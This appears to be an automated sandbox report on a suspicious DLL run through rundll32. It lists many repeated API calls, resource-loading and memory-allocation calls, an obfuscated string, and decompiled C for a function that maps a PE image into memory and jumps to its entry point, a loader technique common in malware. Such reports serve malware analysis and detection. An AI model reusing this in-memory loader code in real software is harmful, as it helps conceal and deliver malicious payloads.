ShowWindow.USER32(00000000,00000000), ref: 10004555
ShowWindow.USER32(00000000,00000000), ref: 1000455B
ShowWindow.USER32(00000000,00000000), ref: 10004561
ShowWindow.USER32(00000000,00000000), ref: 10004567
ShowWindow.USER32(00000000,00000000), ref: 1000456D
ShowWindow.USER32(00000000,00000000), ref: 10004573
ShowWindow.USER32(00000000,00000000), ref: 10004579
ShowWindow.USER32(00000000,00000000), ref: 1000457F
ShowWindow.USER32(00000000,00000000), ref: 10004585
ShowWindow.USER32(00000000,00000000), ref: 1000458B
ShowWindow.USER32(00000000,00000000), ref: 10004591
ShowWindow.USER32(00000000,00000000), ref: 10004597
ShowWindow.USER32(00000000,00000000), ref: 1000459D
ShowWindow.USER32(00000000,00000000), ref: 100045A3
ShowWindow.USER32(00000000,00000000), ref: 100045A9
ShowWindow.USER32(00000000,00000000), ref: 100045AF
ShowWindow.USER32(00000000,00000000), ref: 100045B5
ShowWindow.USER32(00000000,00000000), ref: 100045BB
ShowWindow.USER32(00000000,00000000), ref: 100045C1
ShowWindow.USER32(00000000,00000000), ref: 100045C7
ShowWindow.USER32(00000000,00000000), ref: 100045CD
ShowWindow.USER32(00000000,00000000), ref: 100045D3
ShowWindow.USER32(00000000,00000000), ref: 100045D9
ShowWindow.USER32(00000000,00000000), ref: 100045DF
ShowWindow.USER32(00000000,00000000), ref: 100045E5
ShowWindow.USER32(00000000,00000000), ref: 100045EB
ShowWindow.USER32(00000000,00000000), ref: 100045F1
ShowWindow.USER32(00000000,00000000), ref: 100045F7
ShowWindow.USER32(00000000,00000000), ref: 100045FD
ShowWindow.USER32(00000000,00000000), ref: 10004603
ShowWindow.USER32(00000000,00000000), ref: 10004609
ShowWindow.USER32(00000000,00000000), ref: 1000460F
ShowWindow.USER32(00000000,00000000), ref: 10004615
ShowWindow.USER32(00000000,00000000), ref: 1000461B
ShowWindow.USER32(00000000,00000000), ref: 10004621
ShowWindow.USER32(00000000,00000000), ref: 10004627
ShowWindow.USER32(00000000,00000000), ref: 1000462D
ShowWindow.USER32(00000000,00000000), ref: 10004633
ShowWindow.USER32(00000000,00000000), ref: 10004639
ShowWindow.USER32(00000000,00000000), ref: 1000463F
ShowWindow.USER32(00000000,00000000), ref: 10004645
ShowWindow.USER32(00000000,00000000), ref: 1000464B
ShowWindow.USER32(00000000,00000000), ref: 10004651
ShowWindow.USER32(00000000,00000000), ref: 10004657
ShowWindow.USER32(00000000,00000000), ref: 1000465D
ShowWindow.USER32(00000000,00000000), ref: 10004663
ShowWindow.USER32(00000000,00000000), ref: 10004669
ShowWindow.USER32(00000000,00000000), ref: 1000466F
ShowWindow.USER32(00000000,00000000), ref: 10004675
ShowWindow.USER32(00000000,00000000), ref: 1000467B
ShowWindow.USER32(00000000,00000000), ref: 10004681
ShowWindow.USER32(00000000,00000000), ref: 10004687
ShowWindow.USER32(00000000,00000000), ref: 1000468D
ShowWindow.USER32(00000000,00000000), ref: 10004693
ShowWindow.USER32(00000000,00000000), ref: 10004699
ShowWindow.USER32(00000000,00000000), ref: 1000469F
ShowWindow.USER32(00000000,00000000), ref: 100046A5
ShowWindow.USER32(00000000,00000000), ref: 100046AB
ShowWindow.USER32(00000000,00000000), ref: 100046B1
ShowWindow.USER32(00000000,00000000), ref: 100046B7
ShowWindow.USER32(00000000,00000000), ref: 100046BD
ShowWindow.USER32(00000000,00000000), ref: 100046C3
ShowWindow.USER32(00000000,00000000), ref: 100046C9
ShowWindow.USER32(00000000,00000000), ref: 100046CF
ShowWindow.USER32(00000000,00000000), ref: 100046D5
ShowWindow.USER32(00000000,00000000), ref: 100046DB
ShowWindow.USER32(00000000,00000000), ref: 100046E1
ShowWindow.USER32(00000000,00000000), ref: 100046E7
ShowWindow.USER32(00000000,00000000), ref: 100046ED
ShowWindow.USER32(00000000,00000000), ref: 100046F3
ShowWindow.USER32(00000000,00000000), ref: 100046F9
ShowWindow.USER32(00000000,00000000), ref: 100046FF
ShowWindow.USER32(00000000,00000000), ref: 10004705
ShowWindow.USER32(00000000,00000000), ref: 1000470B
ShowWindow.USER32(00000000,00000000), ref: 10004711
ShowWindow.USER32(00000000,00000000), ref: 10004717
ShowWindow.USER32(00000000,00000000), ref: 1000471D
ShowWindow.USER32(00000000,00000000), ref: 10004723
ShowWindow.USER32(00000000,00000000), ref: 10004729
ShowWindow.USER32(00000000,00000000), ref: 1000472F
ShowWindow.USER32(00000000,00000000), ref: 10004735
ShowWindow.USER32(00000000,00000000), ref: 1000473B
ShowWindow.USER32(00000000,00000000), ref: 10004741
ShowWindow.USER32(00000000,00000000), ref: 10004747
ShowWindow.USER32(00000000,00000000), ref: 1000474D
ShowWindow.USER32(00000000,00000000), ref: 10004753
ShowWindow.USER32(00000000,00000000), ref: 10004759
ShowWindow.USER32(00000000,00000000), ref: 1000475F
ShowWindow.USER32(00000000,00000000), ref: 10004765
ShowWindow.USER32(00000000,00000000), ref: 1000476B
ShowWindow.USER32(00000000,00000000), ref: 10004771
ShowWindow.USER32(00000000,00000000), ref: 10004777
ShowWindow.USER32(00000000,00000000), ref: 1000477D
ShowWindow.USER32(00000000,00000000), ref: 10004783
ShowWindow.USER32(00000000,00000000), ref: 10004789
ShowWindow.USER32(00000000,00000000), ref: 1000478F
ShowWindow.USER32(00000000,00000000), ref: 10004795
ShowWindow.USER32(00000000,00000000), ref: 1000479B
ShowWindow.USER32(00000000,00000000), ref: 100047A1
ShowWindow.USER32(00000000,00000000), ref: 100047A7
ShowWindow.USER32(00000000,00000000), ref: 100047AD
ShowWindow.USER32(00000000,00000000), ref: 100047B3
ShowWindow.USER32(00000000,00000000), ref: 100047B9
ShowWindow.USER32(00000000,00000000), ref: 100047BF
ShowWindow.USER32(00000000,00000000), ref: 100047C5
ShowWindow.USER32(00000000,00000000), ref: 100047CB
ShowWindow.USER32(00000000,00000000), ref: 100047D1
ShowWindow.USER32(00000000,00000000), ref: 100047D7
ShowWindow.USER32(00000000,00000000), ref: 100047DD
ShowWindow.USER32(00000000,00000000), ref: 100047E3
ShowWindow.USER32(00000000,00000000), ref: 100047E9
ShowWindow.USER32(00000000,00000000), ref: 100047EF
ShowWindow.USER32(00000000,00000000), ref: 100047F5
ShowWindow.USER32(00000000,00000000), ref: 100047FB
ShowWindow.USER32(00000000,00000000), ref: 10004801
ShowWindow.USER32(00000000,00000000), ref: 10004807
ShowWindow.USER32(00000000,00000000), ref: 1000480D
ShowWindow.USER32(00000000,00000000), ref: 10004813
ShowWindow.USER32(00000000,00000000), ref: 10004819
ShowWindow.USER32(00000000,00000000), ref: 1000481F
ShowWindow.USER32(00000000,00000000), ref: 10004825
ShowWindow.USER32(00000000,00000000), ref: 1000482B
ShowWindow.USER32(00000000,00000000), ref: 10004831
ShowWindow.USER32(00000000,00000000), ref: 10004837
ShowWindow.USER32(00000000,00000000), ref: 1000483D
ShowWindow.USER32(00000000,00000000), ref: 10004843
ShowWindow.USER32(00000000,00000000), ref: 10004849
ShowWindow.USER32(00000000,00000000), ref: 1000484F
ShowWindow.USER32(00000000,00000000), ref: 10004855
ShowWindow.USER32(00000000,00000000), ref: 1000485B
ShowWindow.USER32(00000000,00000000), ref: 10004861
ShowWindow.USER32(00000000,00000000), ref: 10004867
ShowWindow.USER32(00000000,00000000), ref: 1000486D
ShowWindow.USER32(00000000,00000000), ref: 10004873
ShowWindow.USER32(00000000,00000000), ref: 10004879
ShowWindow.USER32(00000000,00000000), ref: 1000487F
ShowWindow.USER32(00000000,00000000), ref: 10004885
ShowWindow.USER32(00000000,00000000), ref: 1000488B
ShowWindow.USER32(00000000,00000000), ref: 10004891
ShowWindow.USER32(00000000,00000000), ref: 10004897
ShowWindow.USER32(00000000,00000000), ref: 1000489D
ShowWindow.USER32(00000000,00000000), ref: 100048A3
ShowWindow.USER32(00000000,00000000), ref: 100048A9
ShowWindow.USER32(00000000,00000000), ref: 100048AF
ShowWindow.USER32(00000000,00000000), ref: 100048B5
ShowWindow.USER32(00000000,00000000), ref: 100048BB
ShowWindow.USER32(00000000,00000000), ref: 100048C1
ShowWindow.USER32(00000000,00000000), ref: 100048C7
ShowWindow.USER32(00000000,00000000), ref: 100048CD
ShowWindow.USER32(00000000,00000000), ref: 100048D3
ShowWindow.USER32(00000000,00000000), ref: 100048D9
ShowWindow.USER32(00000000,00000000), ref: 100048DF
ShowWindow.USER32(00000000,00000000), ref: 100048E5
ShowWindow.USER32(00000000,00000000), ref: 100048EB
ShowWindow.USER32(00000000,00000000), ref: 100048F1
ShowWindow.USER32(00000000,00000000), ref: 100048F7
ShowWindow.USER32(00000000,00000000), ref: 100048FD
ShowWindow.USER32(00000000,00000000), ref: 10004903
ShowWindow.USER32(00000000,00000000), ref: 10004909
ShowWindow.USER32(00000000,00000000), ref: 1000490F
ShowWindow.USER32(00000000,00000000), ref: 10004915
ShowWindow.USER32(00000000,00000000), ref: 1000491B
ShowWindow.USER32(00000000,00000000), ref: 10004921
ShowWindow.USER32(00000000,00000000), ref: 10004927
ShowWindow.USER32(00000000,00000000), ref: 1000492D
ShowWindow.USER32(00000000,00000000), ref: 10004933
ShowWindow.USER32(00000000,00000000), ref: 10004939
ShowWindow.USER32(00000000,00000000), ref: 1000493F
ShowWindow.USER32(00000000,00000000), ref: 10004945
ShowWindow.USER32(00000000,00000000), ref: 1000494B
ShowWindow.USER32(00000000,00000000), ref: 10004951
ShowWindow.USER32(00000000,00000000), ref: 10004957
ShowWindow.USER32(00000000,00000000), ref: 1000495D
ShowWindow.USER32(00000000,00000000), ref: 10004963
ShowWindow.USER32(00000000,00000000), ref: 10004969
ShowWindow.USER32(00000000,00000000), ref: 1000496F
ShowWindow.USER32(00000000,00000000), ref: 10004975
ShowWindow.USER32(00000000,00000000), ref: 1000497B
ShowWindow.USER32(00000000,00000000), ref: 10004981
ShowWindow.USER32(00000000,00000000), ref: 10004987
ShowWindow.USER32(00000000,00000000), ref: 1000498D
ShowWindow.USER32(00000000,00000000), ref: 10004993
ShowWindow.USER32(00000000,00000000), ref: 10004999
ShowWindow.USER32(00000000,00000000), ref: 1000499F
ShowWindow.USER32(00000000,00000000), ref: 100049A5
ShowWindow.USER32(00000000,00000000), ref: 100049AB
ShowWindow.USER32(00000000,00000000), ref: 100049B1
ShowWindow.USER32(00000000,00000000), ref: 100049B7
ShowWindow.USER32(00000000,00000000), ref: 100049BD
ShowWindow.USER32(00000000,00000000), ref: 100049C3
ShowWindow.USER32(00000000,00000000), ref: 100049C9
ShowWindow.USER32(00000000,00000000), ref: 100049CF
ShowWindow.USER32(00000000,00000000), ref: 100049D5
ShowWindow.USER32(00000000,00000000), ref: 100049DB
ShowWindow.USER32(00000000,00000000), ref: 100049E1
ShowWindow.USER32(00000000,00000000), ref: 100049E7
ShowWindow.USER32(00000000,00000000), ref: 100049ED
ShowWindow.USER32(00000000,00000000), ref: 100049F3
ShowWindow.USER32(00000000,00000000), ref: 100049F9
ShowWindow.USER32(00000000,00000000), ref: 100049FF
ShowWindow.USER32(00000000,00000000), ref: 10004A05
ShowWindow.USER32(00000000,00000000), ref: 10004A0B
ShowWindow.USER32(00000000,00000000), ref: 10004A11
ShowWindow.USER32(00000000,00000000), ref: 10004A17
ShowWindow.USER32(00000000,00000000), ref: 10004A1D
ShowWindow.USER32(00000000,00000000), ref: 10004A23
ShowWindow.USER32(00000000,00000000), ref: 10004A29
ShowWindow.USER32(00000000,00000000), ref: 10004A2F
ShowWindow.USER32(00000000,00000000), ref: 10004A35
ShowWindow.USER32(00000000,00000000), ref: 10004A3B
ShowWindow.USER32(00000000,00000000), ref: 10004A41
ShowWindow.USER32(00000000,00000000), ref: 10004A47
ShowWindow.USER32(00000000,00000000), ref: 10004A4D
ShowWindow.USER32(00000000,00000000), ref: 10004A53
ShowWindow.USER32(00000000,00000000), ref: 10004A59
ShowWindow.USER32(00000000,00000000), ref: 10004A5F
ShowWindow.USER32(00000000,00000000), ref: 10004A65
ShowWindow.USER32(00000000,00000000), ref: 10004A6B
ShowWindow.USER32(00000000,00000000), ref: 10004A71
ShowWindow.USER32(00000000,00000000), ref: 10004A77
ShowWindow.USER32(00000000,00000000), ref: 10004A7D
ShowWindow.USER32(00000000,00000000), ref: 10004A83
ShowWindow.USER32(00000000,00000000), ref: 10004A89
ShowWindow.USER32(00000000,00000000), ref: 10004A8F
ShowWindow.USER32(00000000,00000000), ref: 10004A95
ShowWindow.USER32(00000000,00000000), ref: 10004A9B
ShowWindow.USER32(00000000,00000000), ref: 10004AA1
ShowWindow.USER32(00000000,00000000), ref: 10004AA7
ShowWindow.USER32(00000000,00000000), ref: 10004AAD
ShowWindow.USER32(00000000,00000000), ref: 10004AB3
ShowWindow.USER32(00000000,00000000), ref: 10004AB9
ShowWindow.USER32(00000000,00000000), ref: 10004ABF
ShowWindow.USER32(00000000,00000000), ref: 10004AC5
ShowWindow.USER32(00000000,00000000), ref: 10004ACB
ShowWindow.USER32(00000000,00000000), ref: 10004AD1
ShowWindow.USER32(00000000,00000000), ref: 10004AD7
ShowWindow.USER32(00000000,00000000), ref: 10004ADD
ShowWindow.USER32(00000000,00000000), ref: 10004AE3
ShowWindow.USER32(00000000,00000000), ref: 10004AE9
ShowWindow.USER32(00000000,00000000), ref: 10004AEF
ShowWindow.USER32(00000000,00000000), ref: 10004AF5
ShowWindow.USER32(00000000,00000000), ref: 10004AFB
ShowWindow.USER32(00000000,00000000), ref: 10004B01
ShowWindow.USER32(00000000,00000000), ref: 10004B07
ShowWindow.USER32(00000000,00000000), ref: 10004B0D
ShowWindow.USER32(00000000,00000000), ref: 10004B13
ShowWindow.USER32(00000000,00000000), ref: 10004B19
ShowWindow.USER32(00000000,00000000), ref: 10004B1F
ShowWindow.USER32(00000000,00000000), ref: 10004B25
ShowWindow.USER32(00000000,00000000), ref: 10004B2B
ShowWindow.USER32(00000000,00000000), ref: 10004B31
ShowWindow.USER32(00000000,00000000), ref: 10004B37
ShowWindow.USER32(00000000,00000000), ref: 10004B3D
ShowWindow.USER32(00000000,00000000), ref: 10004B43
ShowWindow.USER32(00000000,00000000), ref: 10004B49
ShowWindow.USER32(00000000,00000000), ref: 10004B4F
ShowWindow.USER32(00000000,00000000), ref: 10004B55
ShowWindow.USER32(00000000,00000000), ref: 10004B5B
ShowWindow.USER32(00000000,00000000), ref: 10004B61
ShowWindow.USER32(00000000,00000000), ref: 10004B67
ShowWindow.USER32(00000000,00000000), ref: 10004B6D
ShowWindow.USER32(00000000,00000000), ref: 10004B73
ShowWindow.USER32(00000000,00000000), ref: 10004B79
ShowWindow.USER32(00000000,00000000), ref: 10004B7F
ShowWindow.USER32(00000000,00000000), ref: 10004B85
ShowWindow.USER32(00000000,00000000), ref: 10004B8B
ShowWindow.USER32(00000000,00000000), ref: 10004B91
ShowWindow.USER32(00000000,00000000), ref: 10004B97
ShowWindow.USER32(00000000,00000000), ref: 10004B9D
ShowWindow.USER32(00000000,00000000), ref: 10004BA3
ShowWindow.USER32(00000000,00000000), ref: 10004BA9
ShowWindow.USER32(00000000,00000000), ref: 10004BAF
ShowWindow.USER32(00000000,00000000), ref: 10004BB5
ShowWindow.USER32(00000000,00000000), ref: 10004BBB
ShowWindow.USER32(00000000,00000000), ref: 10004BC1
ShowWindow.USER32(00000000,00000000), ref: 10004BC7
ShowWindow.USER32(00000000,00000000), ref: 10004BCD
ShowWindow.USER32(00000000,00000000), ref: 10004BD3
ShowWindow.USER32(00000000,00000000), ref: 10004BD9
ShowWindow.USER32(00000000,00000000), ref: 10004BDF
ShowWindow.USER32(00000000,00000000), ref: 10004BE5
ShowWindow.USER32(00000000,00000000), ref: 10004BEB
ShowWindow.USER32(00000000,00000000), ref: 10004BF1
ShowWindow.USER32(00000000,00000000), ref: 10004BF7
ShowWindow.USER32(00000000,00000000), ref: 10004BFD
ShowWindow.USER32(00000000,00000000), ref: 10004C03
ShowWindow.USER32(00000000,00000000), ref: 10004C09
ShowWindow.USER32(00000000,00000000), ref: 10004C0F
ShowWindow.USER32(00000000,00000000), ref: 10004C15
ShowWindow.USER32(00000000,00000000), ref: 10004C1B
ShowWindow.USER32(00000000,00000000), ref: 10004C21
ShowWindow.USER32(00000000,00000000), ref: 10004C27
ShowWindow.USER32(00000000,00000000), ref: 10004C2D
ShowWindow.USER32(00000000,00000000), ref: 10004C33
ShowWindow.USER32(00000000,00000000), ref: 10004C39
ShowWindow.USER32(00000000,00000000), ref: 10004C3F
ShowWindow.USER32(00000000,00000000), ref: 10004C45
ShowWindow.USER32(00000000,00000000), ref: 10004C4B
ShowWindow.USER32(00000000,00000000), ref: 10004C51
ShowWindow.USER32(00000000,00000000), ref: 10004C57
ShowWindow.USER32(00000000,00000000), ref: 10004C5D
ShowWindow.USER32(00000000,00000000), ref: 10004C63
ShowWindow.USER32(00000000,00000000), ref: 10004C69
ShowWindow.USER32(00000000,00000000), ref: 10004C6F
ShowWindow.USER32(00000000,00000000), ref: 10004C75
ShowWindow.USER32(00000000,00000000), ref: 10004C7B
ShowWindow.USER32(00000000,00000000), ref: 10004C81
ShowWindow.USER32(00000000,00000000), ref: 10004C87
ShowWindow.USER32(00000000,00000000), ref: 10004C8D
ShowWindow.USER32(00000000,00000000), ref: 10004C93
ShowWindow.USER32(00000000,00000000), ref: 10004C99
ShowWindow.USER32(00000000,00000000), ref: 10004C9F
ShowWindow.USER32(00000000,00000000), ref: 10004CA5
ShowWindow.USER32(00000000,00000000), ref: 10004CAB
ShowWindow.USER32(00000000,00000000), ref: 10004CB1
ShowWindow.USER32(00000000,00000000), ref: 10004CB7
ShowWindow.USER32(00000000,00000000), ref: 10004CBD
ShowWindow.USER32(00000000,00000000), ref: 10004CC3
ShowWindow.USER32(00000000,00000000), ref: 10004CC9
ShowWindow.USER32(00000000,00000000), ref: 10004CCF
ShowWindow.USER32(00000000,00000000), ref: 10004CD5
ShowWindow.USER32(00000000,00000000), ref: 10004CDB
ShowWindow.USER32(00000000,00000000), ref: 10004CE1
ShowWindow.USER32(00000000,00000000), ref: 10004CE7
ShowWindow.USER32(00000000,00000000), ref: 10004CED
ShowWindow.USER32(00000000,00000000), ref: 10004CF3
ShowWindow.USER32(00000000,00000000), ref: 10004CF9
ShowWindow.USER32(00000000,00000000), ref: 10004CFF
ShowWindow.USER32(00000000,00000000), ref: 10004D05
ShowWindow.USER32(00000000,00000000), ref: 10004D0B
ShowWindow.USER32(00000000,00000000), ref: 10004D11
ShowWindow.USER32(00000000,00000000), ref: 10004D17
ShowWindow.USER32(00000000,00000000), ref: 10004D1D
ShowWindow.USER32(00000000,00000000), ref: 10004D23
ShowWindow.USER32(00000000,00000000), ref: 10004D29
ShowWindow.USER32(00000000,00000000), ref: 10004D2F
ShowWindow.USER32(00000000,00000000), ref: 10004D35
ShowWindow.USER32(00000000,00000000), ref: 10004D3B
ShowWindow.USER32(00000000,00000000), ref: 10004D41
ShowWindow.USER32(00000000,00000000), ref: 10004D47
ShowWindow.USER32(00000000,00000000), ref: 10004D4D
ShowWindow.USER32(00000000,00000000), ref: 10004D53
ShowWindow.USER32(00000000,00000000), ref: 10004D59
ShowWindow.USER32(00000000,00000000), ref: 10004D5F
ShowWindow.USER32(00000000,00000000), ref: 10004D65
ShowWindow.USER32(00000000,00000000), ref: 10004D6B
ShowWindow.USER32(00000000,00000000), ref: 10004D71
ShowWindow.USER32(00000000,00000000), ref: 10004D77
ShowWindow.USER32(00000000,00000000), ref: 10004D7D
ShowWindow.USER32(00000000,00000000), ref: 10004D83
ShowWindow.USER32(00000000,00000000), ref: 10004D89
ShowWindow.USER32(00000000,00000000), ref: 10004D8F
ShowWindow.USER32(00000000,00000000), ref: 10004D95
ShowWindow.USER32(00000000,00000000), ref: 10004D9B
ShowWindow.USER32(00000000,00000000), ref: 10004DA1
ShowWindow.USER32(00000000,00000000), ref: 10004DA7
ShowWindow.USER32(00000000,00000000), ref: 10004DAD
ShowWindow.USER32(00000000,00000000), ref: 10004DB3
ShowWindow.USER32(00000000,00000000), ref: 10004DB9
ShowWindow.USER32(00000000,00000000), ref: 10004DBF

Part of subcall function 100023E0: GetCurrentProcess.KERNEL32(00000000,10004DDD,00003000,00000040,00000000,00000000,?,10004DDD,?,00000011), ref: 100023F2
Part of subcall function 100023E0: VirtualAllocExNuma.KERNEL32 ref: 100023F9
Part of subcall function 100023E0: _memmove.LIBCMT ref: 1000241A

GetProcAddress.KERNEL32(00000000,00000000), ref: 10004DE8
GetProcAddress.KERNEL32(00000000,?), ref: 10004E05
LdrFindResource_U.NTDLL(10000000,00000017,00000003,?), ref: 10004E1E
LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 10004E41

Part of subcall function 10008AB6: __wcstoi64.LIBCMT ref: 10008AC9

WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10004E51
VirtualAlloc.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 10005006
_memmove.LIBCMT ref: 1000501B

Part of subcall function 10002CE0: _malloc.LIBCMT ref: 10002CE9

Part of subcall function 100057B0: SetLastError.KERNEL32(0000007F,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100057C9

MessageBoxA.USER32 ref: 1000507A

Strings

LdrF, xrefs: 100032CF
RunDLL, xrefs: 1000505B
Ldr, xrefs: 100031E5
ind, xrefs: 100032F2
ce_U, xrefs: 10003340
ntdll.dll, xrefs: 100032C2
u9!71t6(X5bobTYxh&iO_3G4E0ay8quMMBDUfv74k7jqy3rYzw%0MIr)<iX1(@3xxwY&fp(<&<GgK9WB*TSsgB5ZJHGae7, xrefs: 10005029
Acces, xrefs: 1000323B
sResource, xrefs: 1000325C
Resour, xrefs: 10003313

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$_memmove$AddressAllocProcVirtual$AccessCurrentErrorFileFindGatherLastLibraryLoadMessageNumaProcessResourceResource_Write__wcstoi64_malloc
String ID: Acces$Ldr$LdrF$Resour$RunDLL$ce_U$ind$ntdll.dll$sResource$u9!71t6(X5bobTYxh&iO_3G4E0ay8quMMBDUfv74k7jqy3rYzw%0MIr)<iX1(@3xxwY&fp(<&<GgK9WB*TSsgB5ZJHGae7
API String ID: 961686220-410959807
Opcode ID: 86d0155cc8621d04fb9e94e5240ef9a90cd855b25d03d17ee15038df8d53b642
Instruction ID: d012792b717f4c469d4a00f96b0adf9713f97dc2bac2da2a6d9325f43fc513b6
Opcode Fuzzy Hash: 86d0155cc8621d04fb9e94e5240ef9a90cd855b25d03d17ee15038df8d53b642
Instruction Fuzzy Hash: C0237370FC832875F6B0A7A28C0BF9E6D65DF04FA6F240056F30D3D1C19AE565548EAA

Uniqueness

Uniqueness Score: -1.00%

Function 10005930, Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E10005930(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				void* _t61;
				signed int _t69;
				void* _t74;
				long _t76;
				void* _t87;
				void* _t90;
				void* _t91;
				void* _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				intOrPtr* _t115;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				intOrPtr* _t135;
				signed int _t138;
				long _t141;
				long _t142;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t151;

				_t148 = 0;
				_v8 = __ecx;
				_t61 = E10005380(_a8, 0x40);
				if(_t61 != 0) {
					_t135 = _a4;
					if( *_t135 == 0x5a4d) {
						if(E10005380(_a8,  *((intOrPtr*)(_t135 + 0x3c)) + 0xf8) == 0) {
							L37:
							return 0;
						} else {
							_t115 =  *((intOrPtr*)(_t135 + 0x3c)) + _t135;
							if( *_t115 != 0x4550 ||  *((intOrPtr*)(_t115 + 4)) != 0x14c || ( *(_t115 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t138 =  *(_t115 + 6) & 0x0000ffff;
								_t69 =  *(_t115 + 0x14) & 0x0000ffff;
								if(_t138 != 0) {
									_t129 = _t115 + 0x24 + _t69;
									do {
										_t133 =  *((intOrPtr*)(_t129 + 4));
										_t111 =  *_t129;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t112 = _t111 +  *(_t115 + 0x38);
										}
										_t148 =  >  ? _t112 : _t148;
										_t129 = _t129 + 0x28;
										_t138 = _t138 - 1;
									} while (_t138 != 0);
								}
								__imp__GetNativeSystemInfo( &_v48); // executed
								_t119 = _v44;
								_t18 = _t119 - 1; // -1
								_t19 = _t119 - 1; // -1
								_t131 =  !_t18;
								_t21 = _t119 - 1; // -1
								_t141 = _t19 +  *((intOrPtr*)(_t115 + 0x50)) & _t131;
								if(_t141 != (_t21 + _t148 & _t131)) {
									goto L3;
								} else {
									_t74 = VirtualAlloc( *(_t115 + 0x34), _t141, 0x3000, 4); // executed
									_t149 = _t74;
									_v12 = _t149;
									if(_t149 != 0) {
										L17:
										_t76 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t142 = _t76;
										if(_t142 != 0) {
											 *(_t142 + 4) = _t149;
											 *(_t142 + 0x14) = ( *(_t115 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t142 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t142 + 0x20)) = _a16;
											 *((intOrPtr*)(_t142 + 0x24)) = _a20;
											 *((intOrPtr*)(_t142 + 0x28)) = _a24;
											 *((intOrPtr*)(_t142 + 0x30)) = _v44;
											if(E10005380(_a8,  *(_t115 + 0x54)) == 0) {
												L35:
												_t116 = _v8;
												goto L36;
											} else {
												_t87 = VirtualAlloc(_t149,  *(_t115 + 0x54), 0x1000, 4); // executed
												_t150 = _t87;
												E10005D50(_t150, _a4,  *(_t115 + 0x54));
												_t90 =  *((intOrPtr*)(_a4 + 0x3c)) + _t150;
												_t151 = _v12;
												 *_t142 = _t90;
												 *((intOrPtr*)(_t90 + 0x34)) = _t151;
												_t91 = E100053B0(_v8, _a4, _a8, _t115, _t142); // executed
												if(_t91 == 0) {
													goto L35;
												} else {
													_t94 =  *((intOrPtr*)( *_t142 + 0x34)) ==  *(_t115 + 0x34);
													_t116 = _v8;
													if( *((intOrPtr*)( *_t142 + 0x34)) ==  *(_t115 + 0x34)) {
														 *((intOrPtr*)(_t142 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t142 + 0x18)) = E10005C70(_t142, _t94);
													}
													if(E10005200(_t142) == 0) {
														L36:
														E100056F0(_t142);
														goto L37;
													} else {
														_t96 = E100055A0(_t116, _t142); // executed
														if(_t96 == 0 || E100054A0(_t142) == 0) {
															goto L36;
														} else {
															_t99 =  *((intOrPtr*)( *_t142 + 0x28));
															if(_t99 == 0) {
																 *((intOrPtr*)(_t142 + 0x2c)) = 0;
																return _t142;
															} else {
																_t101 = _t99 + _t151;
																if( *(_t142 + 0x14) == 0) {
																	 *((intOrPtr*)(_t142 + 0x2c)) = _t101;
																	return _t142;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t101() != 0) {
																		 *((intOrPtr*)(_t142 + 0x10)) = 1;
																		return _t142;
																	} else {
																		SetLastError(0x45a);
																		E100056F0(_t142);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t149, _t76, 0x8000);
											goto L19;
										}
									} else {
										_t110 = VirtualAlloc(_t74, _t141, 0x3000, 4); // executed
										_t149 = _t110;
										_v12 = _t110;
										if(_t149 == 0) {
											L19:
											SetLastError(0xe);
											return 0;
										} else {
											goto L17;
										}
									}
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					return _t61;
				}
			}

0x1000593f
0x10005941
0x10005944
0x1000594b
0x10005956
0x10005961
0x1000598e
0x10005bc5
0x10005bcd
0x10005994
0x10005997
0x1000599f
0x00000000
0x100059b2
0x100059b2
0x100059b6
0x100059bc
0x100059c1
0x100059c3
0x100059c3
0x100059c6
0x100059ca
0x100059d1
0x100059cc
0x100059cc
0x100059cc
0x100059d5
0x100059d8
0x100059db
0x100059db
0x100059c3
0x100059e2
0x100059e8
0x100059eb
0x100059ee
0x100059f1
0x100059f6
0x100059fb
0x10005a01
0x00000000
0x10005a07
0x10005a12
0x10005a18
0x10005a1a
0x10005a1f
0x10005a39
0x10005a44
0x10005a4a
0x10005a4e
0x10005a73
0x10005a80
0x10005a86
0x10005a8c
0x10005a92
0x10005a98
0x10005a9e
0x10005aae
0x10005bba
0x10005bba
0x00000000
0x10005ab4
0x10005abf
0x10005ac8
0x10005ace
0x10005ae0
0x10005ae2
0x10005ae9
0x10005aec
0x10005aef
0x10005af6
0x00000000
0x10005afc
0x10005b01
0x10005b04
0x10005b07
0x10005b17
0x10005b09
0x10005b12
0x10005b12
0x10005b28
0x10005bbd
0x10005bc0
0x00000000
0x10005b2e
0x10005b31
0x10005b38
0x00000000
0x10005b4a
0x10005b4c
0x10005b51
0x10005ba8
0x10005bb7
0x10005b53
0x10005b53
0x10005b59
